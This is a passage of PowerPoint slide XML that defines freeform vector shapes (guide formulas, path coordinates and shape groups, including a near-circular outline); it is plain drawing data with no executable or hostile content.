                  <a:gd name="T18" fmla="*/ 126 w 720"/>
                  <a:gd name="T19" fmla="*/ 316 h 411"/>
                  <a:gd name="T20" fmla="*/ 121 w 720"/>
                  <a:gd name="T21" fmla="*/ 331 h 411"/>
                  <a:gd name="T22" fmla="*/ 121 w 720"/>
                  <a:gd name="T23" fmla="*/ 357 h 411"/>
                  <a:gd name="T24" fmla="*/ 121 w 720"/>
                  <a:gd name="T25" fmla="*/ 357 h 411"/>
                  <a:gd name="T26" fmla="*/ 126 w 720"/>
                  <a:gd name="T27" fmla="*/ 373 h 411"/>
                  <a:gd name="T28" fmla="*/ 126 w 720"/>
                  <a:gd name="T29" fmla="*/ 373 h 411"/>
                  <a:gd name="T30" fmla="*/ 131 w 720"/>
                  <a:gd name="T31" fmla="*/ 389 h 411"/>
                  <a:gd name="T32" fmla="*/ 32 w 720"/>
                  <a:gd name="T33" fmla="*/ 410 h 411"/>
                  <a:gd name="T34" fmla="*/ 32 w 720"/>
                  <a:gd name="T35" fmla="*/ 410 h 411"/>
                  <a:gd name="T36" fmla="*/ 21 w 720"/>
                  <a:gd name="T37" fmla="*/ 363 h 411"/>
                  <a:gd name="T38" fmla="*/ 21 w 720"/>
                  <a:gd name="T39" fmla="*/ 363 h 411"/>
                  <a:gd name="T40" fmla="*/ 11 w 720"/>
                  <a:gd name="T41" fmla="*/ 316 h 411"/>
                  <a:gd name="T42" fmla="*/ 11 w 720"/>
                  <a:gd name="T43" fmla="*/ 316 h 411"/>
                  <a:gd name="T44" fmla="*/ 5 w 720"/>
                  <a:gd name="T45" fmla="*/ 279 h 411"/>
                  <a:gd name="T46" fmla="*/ 0 w 720"/>
                  <a:gd name="T47" fmla="*/ 247 h 411"/>
                  <a:gd name="T48" fmla="*/ 0 w 720"/>
                  <a:gd name="T49" fmla="*/ 247 h 411"/>
                  <a:gd name="T50" fmla="*/ 5 w 720"/>
                  <a:gd name="T51" fmla="*/ 226 h 411"/>
                  <a:gd name="T52" fmla="*/ 16 w 720"/>
                  <a:gd name="T53" fmla="*/ 206 h 411"/>
                  <a:gd name="T54" fmla="*/ 16 w 720"/>
                  <a:gd name="T55" fmla="*/ 206 h 411"/>
                  <a:gd name="T56" fmla="*/ 32 w 720"/>
                  <a:gd name="T57" fmla="*/ 189 h 411"/>
                  <a:gd name="T58" fmla="*/ 58 w 720"/>
                  <a:gd name="T59" fmla="*/ 179 h 411"/>
                  <a:gd name="T60" fmla="*/ 58 w 720"/>
                  <a:gd name="T61" fmla="*/ 179 h 411"/>
                  <a:gd name="T62" fmla="*/ 126 w 720"/>
                  <a:gd name="T63" fmla="*/ 158 h 411"/>
                  <a:gd name="T64" fmla="*/ 436 w 720"/>
                  <a:gd name="T65" fmla="*/ 89 h 411"/>
                  <a:gd name="T66" fmla="*/ 420 w 720"/>
                  <a:gd name="T67" fmla="*/ 22 h 411"/>
                  <a:gd name="T68" fmla="*/ 520 w 720"/>
                  <a:gd name="T69" fmla="*/ 0 h 411"/>
                  <a:gd name="T70" fmla="*/ 530 w 720"/>
                  <a:gd name="T71" fmla="*/ 69 h 411"/>
                  <a:gd name="T72" fmla="*/ 688 w 720"/>
                  <a:gd name="T73" fmla="*/ 37 h 411"/>
                  <a:gd name="T74" fmla="*/ 719 w 720"/>
                  <a:gd name="T75" fmla="*/ 179 h 4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20" h="411">
                    <a:moveTo>
                      <a:pt x="719" y="179"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="562" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="577" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="688" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="719" y="179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7" name="Freeform 52"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7402513" y="3316288"/>
                <a:ext cx="285750" cy="160337"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 110 w 793"/>
                  <a:gd name="T1" fmla="*/ 178 h 447"/>
                  <a:gd name="T2" fmla="*/ 110 w 793"/>
                  <a:gd name="T3" fmla="*/ 178 h 447"/>
                  <a:gd name="T4" fmla="*/ 120 w 793"/>
                  <a:gd name="T5" fmla="*/ 210 h 447"/>
                  <a:gd name="T6" fmla="*/ 125 w 793"/>
                  <a:gd name="T7" fmla="*/ 221 h 447"/>
                  <a:gd name="T8" fmla="*/ 136 w 793"/>
                  <a:gd name="T9" fmla="*/ 231 h 447"/>
                  <a:gd name="T10" fmla="*/ 136 w 793"/>
                  <a:gd name="T11" fmla="*/ 231 h 447"/>
                  <a:gd name="T12" fmla="*/ 162 w 793"/>
                  <a:gd name="T13" fmla="*/ 241 h 447"/>
                  <a:gd name="T14" fmla="*/ 194 w 793"/>
                  <a:gd name="T15" fmla="*/ 241 h 447"/>
                  <a:gd name="T16" fmla="*/ 724 w 793"/>
                  <a:gd name="T17" fmla="*/ 0 h 447"/>
                  <a:gd name="T18" fmla="*/ 745 w 793"/>
                  <a:gd name="T19" fmla="*/ 147 h 447"/>
                  <a:gd name="T20" fmla="*/ 378 w 793"/>
                  <a:gd name="T21" fmla="*/ 289 h 447"/>
                  <a:gd name="T22" fmla="*/ 378 w 793"/>
                  <a:gd name="T23" fmla="*/ 294 h 447"/>
                  <a:gd name="T24" fmla="*/ 771 w 793"/>
                  <a:gd name="T25" fmla="*/ 304 h 447"/>
                  <a:gd name="T26" fmla="*/ 792 w 793"/>
                  <a:gd name="T27" fmla="*/ 446 h 447"/>
                  <a:gd name="T28" fmla="*/ 257 w 793"/>
                  <a:gd name="T29" fmla="*/ 394 h 447"/>
                  <a:gd name="T30" fmla="*/ 257 w 793"/>
                  <a:gd name="T31" fmla="*/ 394 h 447"/>
                  <a:gd name="T32" fmla="*/ 194 w 793"/>
                  <a:gd name="T33" fmla="*/ 383 h 447"/>
                  <a:gd name="T34" fmla="*/ 141 w 793"/>
                  <a:gd name="T35" fmla="*/ 373 h 447"/>
                  <a:gd name="T36" fmla="*/ 141 w 793"/>
                  <a:gd name="T37" fmla="*/ 373 h 447"/>
                  <a:gd name="T38" fmla="*/ 99 w 793"/>
                  <a:gd name="T39" fmla="*/ 362 h 447"/>
                  <a:gd name="T40" fmla="*/ 68 w 793"/>
                  <a:gd name="T41" fmla="*/ 347 h 447"/>
                  <a:gd name="T42" fmla="*/ 68 w 793"/>
                  <a:gd name="T43" fmla="*/ 347 h 447"/>
                  <a:gd name="T44" fmla="*/ 47 w 793"/>
                  <a:gd name="T45" fmla="*/ 325 h 447"/>
                  <a:gd name="T46" fmla="*/ 31 w 793"/>
                  <a:gd name="T47" fmla="*/ 294 h 447"/>
                  <a:gd name="T48" fmla="*/ 31 w 793"/>
                  <a:gd name="T49" fmla="*/ 294 h 447"/>
                  <a:gd name="T50" fmla="*/ 15 w 793"/>
                  <a:gd name="T51" fmla="*/ 257 h 447"/>
                  <a:gd name="T52" fmla="*/ 10 w 793"/>
                  <a:gd name="T53" fmla="*/ 215 h 447"/>
                  <a:gd name="T54" fmla="*/ 0 w 793"/>
                  <a:gd name="T55" fmla="*/ 157 h 447"/>
                  <a:gd name="T56" fmla="*/ 104 w 793"/>
                  <a:gd name="T57" fmla="*/ 142 h 447"/>
                  <a:gd name="T58" fmla="*/ 104 w 793"/>
                  <a:gd name="T59" fmla="*/ 142 h 447"/>
                  <a:gd name="T60" fmla="*/ 110 w 793"/>
                  <a:gd name="T61" fmla="*/ 178 h 4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93" h="447">
                    <a:moveTo>
                      <a:pt x="110" y="178"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="110" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="771" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="792" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="178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408" name="Group 407"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4165238" y="3462096"/>
            <a:ext cx="946984" cy="946983"/>
            <a:chOff x="4162063" y="3458921"/>
            <a:chExt cx="946984" cy="946983"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="409" name="Freeform 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4162063" y="3458921"/>
              <a:ext cx="946984" cy="946983"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1895 w 4000"/>
                <a:gd name="T1" fmla="*/ 5 h 4000"/>
                <a:gd name="T2" fmla="*/ 1596 w 4000"/>
                <a:gd name="T3" fmla="*/ 42 h 4000"/>
                <a:gd name="T4" fmla="*/ 1312 w 4000"/>
                <a:gd name="T5" fmla="*/ 120 h 4000"/>
                <a:gd name="T6" fmla="*/ 1045 w 4000"/>
                <a:gd name="T7" fmla="*/ 241 h 4000"/>
                <a:gd name="T8" fmla="*/ 803 w 4000"/>
                <a:gd name="T9" fmla="*/ 399 h 4000"/>
                <a:gd name="T10" fmla="*/ 587 w 4000"/>
                <a:gd name="T11" fmla="*/ 587 h 4000"/>
                <a:gd name="T12" fmla="*/ 399 w 4000"/>
                <a:gd name="T13" fmla="*/ 803 h 4000"/>
                <a:gd name="T14" fmla="*/ 241 w 4000"/>
                <a:gd name="T15" fmla="*/ 1045 h 4000"/>
                <a:gd name="T16" fmla="*/ 120 w 4000"/>
                <a:gd name="T17" fmla="*/ 1312 h 4000"/>
                <a:gd name="T18" fmla="*/ 42 w 4000"/>
                <a:gd name="T19" fmla="*/ 1596 h 4000"/>
                <a:gd name="T20" fmla="*/ 5 w 4000"/>
                <a:gd name="T21" fmla="*/ 1895 h 4000"/>
                <a:gd name="T22" fmla="*/ 5 w 4000"/>
                <a:gd name="T23" fmla="*/ 2104 h 4000"/>
                <a:gd name="T24" fmla="*/ 42 w 4000"/>
                <a:gd name="T25" fmla="*/ 2403 h 4000"/>
                <a:gd name="T26" fmla="*/ 120 w 4000"/>
                <a:gd name="T27" fmla="*/ 2687 h 4000"/>
                <a:gd name="T28" fmla="*/ 241 w 4000"/>
                <a:gd name="T29" fmla="*/ 2954 h 4000"/>
                <a:gd name="T30" fmla="*/ 399 w 4000"/>
                <a:gd name="T31" fmla="*/ 3196 h 4000"/>
                <a:gd name="T32" fmla="*/ 587 w 4000"/>
                <a:gd name="T33" fmla="*/ 3412 h 4000"/>
                <a:gd name="T34" fmla="*/ 803 w 4000"/>
                <a:gd name="T35" fmla="*/ 3600 h 4000"/>
                <a:gd name="T36" fmla="*/ 1045 w 4000"/>
                <a:gd name="T37" fmla="*/ 3758 h 4000"/>
                <a:gd name="T38" fmla="*/ 1312 w 4000"/>
                <a:gd name="T39" fmla="*/ 3879 h 4000"/>
                <a:gd name="T40" fmla="*/ 1596 w 4000"/>
                <a:gd name="T41" fmla="*/ 3957 h 4000"/>
                <a:gd name="T42" fmla="*/ 1895 w 4000"/>
                <a:gd name="T43" fmla="*/ 3994 h 4000"/>
                <a:gd name="T44" fmla="*/ 2104 w 4000"/>
                <a:gd name="T45" fmla="*/ 3994 h 4000"/>
                <a:gd name="T46" fmla="*/ 2403 w 4000"/>
                <a:gd name="T47" fmla="*/ 3957 h 4000"/>
                <a:gd name="T48" fmla="*/ 2687 w 4000"/>
                <a:gd name="T49" fmla="*/ 3879 h 4000"/>
                <a:gd name="T50" fmla="*/ 2954 w 4000"/>
                <a:gd name="T51" fmla="*/ 3758 h 4000"/>
                <a:gd name="T52" fmla="*/ 3196 w 4000"/>
                <a:gd name="T53" fmla="*/ 3600 h 4000"/>
                <a:gd name="T54" fmla="*/ 3412 w 4000"/>
                <a:gd name="T55" fmla="*/ 3412 h 4000"/>
                <a:gd name="T56" fmla="*/ 3600 w 4000"/>
                <a:gd name="T57" fmla="*/ 3196 h 4000"/>
                <a:gd name="T58" fmla="*/ 3758 w 4000"/>
                <a:gd name="T59" fmla="*/ 2954 h 4000"/>
                <a:gd name="T60" fmla="*/ 3879 w 4000"/>
                <a:gd name="T61" fmla="*/ 2687 h 4000"/>
                <a:gd name="T62" fmla="*/ 3957 w 4000"/>
                <a:gd name="T63" fmla="*/ 2403 h 4000"/>
                <a:gd name="T64" fmla="*/ 3994 w 4000"/>
                <a:gd name="T65" fmla="*/ 2104 h 4000"/>
                <a:gd name="T66" fmla="*/ 3994 w 4000"/>
                <a:gd name="T67" fmla="*/ 1895 h 4000"/>
                <a:gd name="T68" fmla="*/ 3957 w 4000"/>
                <a:gd name="T69" fmla="*/ 1596 h 4000"/>
                <a:gd name="T70" fmla="*/ 3879 w 4000"/>
                <a:gd name="T71" fmla="*/ 1312 h 4000"/>
                <a:gd name="T72" fmla="*/ 3758 w 4000"/>
                <a:gd name="T73" fmla="*/ 1045 h 4000"/>
                <a:gd name="T74" fmla="*/ 3600 w 4000"/>
                <a:gd name="T75" fmla="*/ 803 h 4000"/>
                <a:gd name="T76" fmla="*/ 3412 w 4000"/>
                <a:gd name="T77" fmla="*/ 587 h 4000"/>
                <a:gd name="T78" fmla="*/ 3196 w 4000"/>
                <a:gd name="T79" fmla="*/ 399 h 4000"/>
                <a:gd name="T80" fmla="*/ 2954 w 4000"/>
                <a:gd name="T81" fmla="*/ 241 h 4000"/>
                <a:gd name="T82" fmla="*/ 2687 w 4000"/>
                <a:gd name="T83" fmla="*/ 120 h 4000"/>
                <a:gd name="T84" fmla="*/ 2403 w 4000"/>
                <a:gd name="T85" fmla="*/ 42 h 4000"/>
                <a:gd name="T86" fmla="*/ 2104 w 4000"/>
                <a:gd name="T87" fmla="*/ 5 h 4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000" h="4000">
                  <a:moveTo>
                    <a:pt x="2000" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2000" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1895" y="5"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1795" y="10"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1696" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1596" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1501" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1407" y="89"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1312" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1223" y="157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1134" y="199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045" y="241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="961" y="289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="881" y="341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="803" y="399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730" y="457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="656" y="520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587" y="587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520" y="656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457" y="730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="399" y="803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341" y="881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289" y="961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241" y="1045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199" y="1134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157" y="1223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120" y="1312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89" y="1407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63" y="1501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="1596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="1696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="1795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5" y="1895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5" y="2104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="2204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="2303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="2403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63" y="2498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89" y="2592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120" y="2687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157" y="2776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199" y="2865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241" y="2954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289" y="3038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341" y="3118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="399" y="3196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457" y="3269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520" y="3343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587" y="3412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="656" y="3479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730" y="3542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="803" y="3600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="881" y="3658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="961" y="3710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045" y="3758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1134" y="3800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1223" y="3842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1312" y="3879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1407" y="3910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1501" y="3936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1596" y="3957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1696" y="3978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1795" y="3989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1895" y="3994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2000" y="3999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2000" y="3999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2104" y="3994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2204" y="3989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2303" y="3978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2403" y="3957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2498" y="3936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2592" y="3910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2687" y="3879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2776" y="3842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2865" y="3800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954" y="3758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3038" y="3710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3118" y="3658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3196" y="3600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3269" y="3542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3343" y="3479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3412" y="3412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3479" y="3343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3542" y="3269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3600" y="3196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3658" y="3118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3710" y="3038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3758" y="2954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3800" y="2865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3842" y="2776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3879" y="2687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3910" y="2592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3936" y="2498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3957" y="2403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3978" y="2303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989" y="2204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3994" y="2104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3999" y="2000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3999" y="2000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3994" y="1895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989" y="1795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3978" y="1696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3957" y="1596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3936" y="1501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3910" y="1407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3879" y="1312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3842" y="1223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3800" y="1134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3758" y="1045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3710" y="961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3658" y="881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3600" y="803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3542" y="730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3479" y="656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3412" y="587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3343" y="520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3269" y="457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3196" y="399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3118" y="341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3038" y="289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954" y="241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2865" y="199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2776" y="157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2687" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2592" y="89"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2498" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2403" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2303" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2204" y="10"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2104" y="5"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2000" y="0"/>
                  </a:lnTo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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="410" name="Group 409"/>
            <p:cNvGrpSpPr/>
